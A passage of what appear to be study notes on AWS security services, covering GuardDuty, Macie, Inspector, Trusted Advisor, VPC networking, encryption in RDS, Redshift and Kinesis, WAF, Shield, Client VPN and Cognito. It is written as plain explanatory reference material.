that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. - -* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. -* **Custom rules**: You can create your own rules to check specific customconfigurations. - -Limit of 50 config rules per region before you need to contact AWS for an increase.\ -Non compliant results are NOT deleted. - -# SNS Topic - -SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\ -You can have various endpoints associated to the SNS stream.\ -You can use SNS topic to send notifications to you via email or to SQS to treate programatically the notification. - -# Inspector - -The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to be configured and added at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security. - -These are the tests that AWS Inspector allow you to perform: - -* **CVEs** -* **CIS Benchmarks** -* **Security Best practices** -* **Network Reachability** - -You can make any of those run on the EC2 machines you decide. - -## Element of AWS Inspector - -**Role**: Create or select a role to allow Amazon Inspector to have read only access to the EC2 instances (DescribeInstances)\ -**Assessment Targets**: Group of EC2 instances that you want to run an assessment against\ -**AWS agents**: Software agents that must be install on EC2 instances to monitor. Data is sent to Amazon Inspector using a TLS channel. A regular heartbeat is sent from the agent to the inspector asking for instructions. It can autoupdate itself\ -**Assessment Templates**: Define specific configurations as to how an assessment is run on your EC2 instances. An assessment template cannot be modified after creation. - -* Rules packages to be used -* Duration of the assessment run 15min/1hour/8hours -* SNS topics, select when notify: Starts, finished, change state, reports a finding -* Attributes to b assigned to findings - -**Rule package**: Contains a number of individual rules that are check against an EC2 when an assessment is run. Each one also have a severity (high, medium, low, informational). The possibilities are: - -* Common Vulnerabilities and Exposures (CVEs) -* Center for Internet Security (CIS) Benchmark -* Security Best practices - -Once you have configured the Amazon Inspector Role, the AWS Agents are Installed, the target is configured and the template is configured, you will be able to run it. An assessment run can be stopped, resumed, or deleted. - -Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Assessment Template defines which rules packages to be included in the test. Instances are being evaluated against rules packages included in the assessment template. - -{% hint style="info" %} -Note that nowadays AWS already allow you to **autocreate** all the necesary **configurations** and even automatically **install the agents inside the EC2 instances.** -{% endhint %} - -## **Reporting** - -**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings. - -**Assessment Report**: Provide details on what was assessed and the results of the assessment. - -* The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred. -* The **full report** is the finding report + a list of rules that were passed. - -# Trusted Advisor - -The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service. - -1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money. -2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services. -3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities. -4. **Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources. - -The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, then you will only have access to **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\ -Trusted advisor can send notifications and you can exclude items from it.\ -Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.** - -# Amazon GuardDuty - -Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\ -For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\ -You can **upload list of whitelisted and blacklisted IP addresses** so GuardDuty takes that info into account. - -Finding summary: - -* Finding type -* Severity: 7-8.9High, 4-6.9Medium, 01-3.9Low -* Region -* Account ID -* Resource ID -* Time of detection -* Which threat list was used - -The body has this information: - -* Resource affected -* Action -* Actor: Ip address, port and domain -* Additional Information - -You can invite other accounts to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.\ -There are different IAM Role permissions to allow GuardDuty to get the information and to allow a user to upload IPs whitelisted and blacklisted.\ -GuarDuty uses a service-linked role called "AWSServiceRoleForAmazonGuardDuty" that allows it to retrieve metadata from affected endpoints. - -You pay for the processing of your log files, per 1 million events per months from CloudTrail and per GB of analysed logs from VPC Flow - -When a user disable GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost.\ -If you just stop it, the existing findings will remain. - -# Amazon Macie - -The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account. - -The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data. - -Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data. \ -Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. - -This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data. - -This is useful to avoid data leaks as Macie will detect if you are exposing people information to the Internet. - -It's a **regional service**. - -It requires the existence of IAM Role 'AWSMacieServiceCustomerSetupRole' and it needs AWS CloudTrail to be enabled. - -Pre-defined alerts categories: - -* Anonymized access -* Config compliance -* Credential Loss -* Data compliance -* Files hosting -* Identity enumeration -* Information loss -* Location anomaly -* Open permissions -* Privilege escalation -* Ransomware -* Service disruption -* Suspicious access - -The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. - -The user has the possibility to create new custom alerts. - -**Dashboard categorization**: - -* S3 Objects for selected time range -* S3 Objects -* S3 Objects by PII - Personally Identifiable Information -* S3 Objects by ACL -* High-risk CloudTrail events and associated users -* High-risk CloudTrail errors and associated users -* Activity Location -* CloudTrail Events -* Activity ISPs -* CloudTrail user identity types - -**User Categories**: Macie categorises the users in the following categories: - -* **Platinum**: Users or roles considered to be making high risk API calls. Often they have admins privileges. You should monitor the pretty god in case they are compromised -* **Gold**: Users or roles with history of calling APIs related to infrastructure changes. You should also monitor them -* **Silver**: Users or roles performing medium level risk API calls -* **Bronze**: Users or roles using lowest level of risk based on API calls - -**Identity types:** - -* Root: Request made by root user -* IAM user: Request made by IAM user -* Assumed Role: Request made by temporary assumed credentials (AssumeRole API for STS) -* Federated User: Request made using temporary credentials (GetFederationToken API fro STS) -* AWS Account: Request made by a different AWS account -* AWS Service: Request made by an AWS service - -**Data classification**: 4 file classifications exists: - -* Content-Type: list files based on content-type detected. The given risk is determined by the type of content detected. -* File Extension: Same as content-type but based on the extension -* Theme: Categorises based on a series of keywords detected within the files -* Regex: Categories based on specific regexps - -The final risk of a file will be the highest risk found between those 4 categories - -The research function allows to create you own queries again all Amazon Macie data and perform a deep dive analysis of the data. You can filter results based on: CloudTrail Data, S3 Bucket properties and S3 Objects - -It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie. - -# Route 53 - -You can very easily create **health checks for web pages** via Route53. For example you can create HTTP checks on port 80 to a page to check that the web server is working. - -Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get response from the instance if the instances are healthy. - -# CloufFront - -Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. - -The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. - -**By default cookie logging is disabled** but you can enable it. - -# VPC - -## VPC Flow Logs - -Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. - -Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**. - -Limitations: - -* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. -* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces -* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. -* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. -* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. -* Traffic relating to an Amazon Windows activation license from a Windows instance -* Traffic between a network load balancer interface and an endpoint network interface - -For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. - -![](<../.gitbook/assets/image (432).png>) - -![](<../.gitbook/assets/image (433).png>) - -## Subnets - -Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\ -Valid CIDR are from a /16 netmask to a /28 netmask.\ -A subnet cannot be in different availability zones at the same time. - -By having **multiple Subnets with similar resources grouped together**, it allows for greater security management. By implementing **network level virtual firewalls,** called network access control lists, or **NACLs**, it's possible to **filter traffic** on specific ports from both an ingress and egress point at the Subnet level. - -When you create a subnet the **network** and **broadcast address** of the subnet **can't be used** for host addresses and **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. - -It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** - -In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. This Internet gateway is a managed service, controlled, configured, and maintained by AWS. It scales horizontally automatically, and is classified as a highly valuable component of your VPC infrastructure. Once your Internet gateway is attached to your VPC, you have a gateway to the Internet. However, at this point, your instances have no idea how to get out to the Internet. As a result, you need to add a default route to the route table associated with your subnet. The route could have a **destination value of 0.0. 0. 0/0, and the target value will be set as your Internet gateway ID**. - -By default, all subnets have the automatic assigned of public IP addresses turned off but it can be turned on. - -**A local route within a route table enables communication between VPC subnets.** - -If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. - -## VPC Peering - -VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. - -Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\ -If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\ -Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.** - -# AWS Secrets Manager - -AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**. - -AWS Secrets Manager enables the **ease of rotating secrets** and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys. - -Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies. - -To allow a user form a different account to access your secret you need to authorize him to access the secret and also authorize him to decrypt the secret in KMS. The Key policy also needs to allows the external user to use it. - -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** - -# EMR - -EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark. - -From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters. - -One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available. - -* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider. -* **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm. - -From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts. - -Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. - -* Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration. -* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. -* Tez Shuffle Handler uses TLS. -* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer. - -# RDS - Relational Database Service - -RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption. - -By enabling your encryption here, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**. It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**. - -However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. - -Amazon RDS **sends data to CloudWatch every minute by default.** - -In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would **impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions. - -If you want to use the TDE method, then you must first ensure that the database is associated to an option group. Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions. - -Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database. - -# Amazon Kinesis Firehouse - -Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch. - -The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. - -Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption. - -This data can come from a variety of different sources. For example, log data from the infrastructure, social media, web clicks during feeds, market data, etc. So now we have a high-level overview of each of these. We need to understand how they implement encryption of any data process in stored should it be required. - -When clients are **sending data to Kinesis in transit**, the data can be sent over **HTTPS**, which is HTTP with SSL encryption. However, once it enters the Kinesis service, it is then unencrypted by default. Using both **Kinesis Streams and Firehose encryption, you can assure your streams remain encrypted up until the data is sent to its final destination.** As **Amazon Streams** now has the ability to implement SSE encryption using KMS to **encrypt data as it enters the stream** directly from the producers. - -If Amazon **S3** is used as a **destination**, Firehose can implement encryption using **SSE-KMS on S3**. - -As a part of this process, it's important to ensure that both producer and consumer applications have permissions to use the KMS key. Otherwise encryption and decryption will not be possible, and you will receive an unauthorized KMS master key permission error. - -Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame. - -# Amazon Redshift - -Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. - -**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted. - -Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. - -## KMS - -During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. - -The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. The CMK is known as the master key, tier one, and once selected, Redshift can enforce the encryption process as follows. So Redshift will send a request to KMS for a new KMS key. - -So Redshift will send a request to KMS for a new KMS key. - -This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory. - -Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory. - -This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database. - -You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. - -## CloudHSM - -When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. - -This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition. - -You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition. - -If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised. - -During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. - -# WAF - -AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define. - -So there are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs - -## Conditions - -Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf. - -You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer. - -## Rules - -Using these conditions you can create rules: For example, block request if 2 conditions are met.\ -When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. - -The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**. - -When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule. - -## Actions - -An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**. - -* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer. -* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken. -* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block. - -If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: - -1. WhiteListed Ips as Allow. -2. BlackListed IPs Block -3. Any Bad Signatures also as Block. - -## CloudWatch - -WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. - -# AWS Firewall Manager - -AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources. - -It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active. - -**Requisites**: Created a Firewall Manager Master Account, setup an AWS organization and have added our member accounts and enable AWS Config. - -A **rule group** (a set of WAF rules together) can be added to an AWS Firewall Manager Policy which is then associated to AWS resources, such as your cloudfront distributions or application load balances. - -**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option). - -# AWS Shield - -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. - -**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. - -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. - -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** - -# VPN - -## Site-to-Site VPN - -**Connect your on premisses network with your VPC.** - -### Concepts - -* **VPN connection**: A secure connection between your on-premises equipment and your VPCs. -* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. - - Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. -* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. -* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. -* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. -* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. - -### Limitations - -* IPv6 traffic is not supported for VPN connections on a virtual private gateway. -* An AWS VPN connection does not support Path MTU Discovery. - -In addition, take the following into consideration when you use Site-to-Site VPN. - -* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. - -## Components of Client VPN - -**Connect from your machine to your VPC** - -### Concepts - -* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. -* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. -* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. -* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. -* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. -* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. -* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. -* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. - -### Limitations - -* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. -* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** -* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. -* The **client CIDR range cannot be changed** after you create the Client VPN endpoint. -* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. -* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. -* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. -* Client VPN supports **IPv4** traffic only. -* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. -* If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. - - ``` - SCRV1:: - ``` -* The self-service portal is **not available for clients that authenticate using mutual authentication**. - -# Amazon Cognito - -Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple. - -The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together. - -## **User pools** - -A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. - -User pools provide: - -* Sign-up and sign-in services. -* A built-in, customizable web UI to sign in users. -* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. -* User directory management and user profiles. -* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. -* Customized workflows 